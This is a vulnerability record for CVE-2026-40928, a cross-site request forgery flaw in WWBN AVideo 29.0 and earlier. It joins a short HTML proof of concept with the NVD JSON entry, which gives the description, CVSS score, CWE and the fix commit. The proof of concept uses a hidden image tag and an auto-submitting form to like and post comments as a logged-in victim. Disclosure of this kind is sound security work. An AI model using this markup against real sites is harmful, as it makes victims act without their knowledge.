CVE-2026-40928

<!-- PoC: Like a comment via CSRF --> <!-- Replace TARGET_URL and COMMENTS_ID with actual values --> <img src="http://TARGET_URL/objects/comments_like.json.php?comments_id=1&like=1" style="display:none;"> <!-- PoC: Add a comment via CSRF --> <!-- Use a form for POST requests if GET is not supported, but description says GET works --> <form action="http://TARGET_URL/objects/commentAddNew.json.php" method="GET"> <input type="hidden" name="video_id" value="1"> <input type="hidden" name="comment" value="Hacked by CSRF"> </form> <script>document.forms[0].submit();</script>

{"cve": {"id": "CVE-2026-40928", "sourceIdentifier": "[email protected]", "published": "2026-04-21T23:16:20.300", "lastModified": "2026-04-23T15:49:02.443", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions 29.0 and prior, multiple AVideo JSON endpoints under `objects/` accept state-changing requests via `$_REQUEST`/`$_GET` and persist changes tied to the caller's session user, without any anti-CSRF token, origin check, or referer check. A malicious page visited by a logged-in victim can silently cast/flip the victim's like/dislike on any comment (`objects/comments_like.json.php`), post a comment authored by the victim on any video, with attacker-chosen text (`objects/commentAddNew.json.php`), and/or delete assets from any category (`objects/categoryDeleteAssets.json.php`) when the victim has category management rights. Each endpoint is reachable from a browser via a simple `<img src=\"…\">` tag or form submission, so exploitation only requires the victim to load an attacker-controlled HTML resource. Commit 7aaad601bd9cd7b993ba0ee1b1bea6c32ee7b77c contains a fix."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "29.0", "matchCriteriaId": "AC38CA07-71C1-4C86-B84A-83CF96367CBA"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/7aaad601bd9cd7b993ba0ee1b1bea6c32ee7b77c", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-x2pw-9c38-cp2j", "source": "[email protected]", "tags": ["Vendor Advisory", "Exploit", "Mitigation"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-x2pw-9c38-cp2j", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory", "Exploit", "Mitigation"]}]}}